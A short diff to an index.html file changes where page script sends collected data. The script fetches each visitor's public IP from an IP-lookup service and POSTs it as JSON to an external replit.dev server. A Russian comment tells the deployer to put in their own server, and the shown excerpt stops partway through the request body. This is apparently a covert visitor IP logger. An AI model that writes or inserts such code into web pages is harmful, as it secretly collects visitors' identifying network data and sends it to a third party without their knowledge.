--- a/index.html
+++ b/index.html
@@ -149,7 +149,7 @@
     fetch("https://api64.ipify.org?format=json")
       .then(response => response.json())
       .then(data => {
-        fetch("https://replit.com/@sadlyconbiz/UnevenLustrousRecursion#main.py", {  // Укажи свой сервер
+        fetch("https://671f67c3-578c-4f94-9ab5-0af236ba82f3-00-wf5gx1mmb88r.spock.replit.dev/", {  // Укажи свой сервер
           method: "POST",
           headers: { "Content-Type": "application/json" },
           body: JSON.stringify({
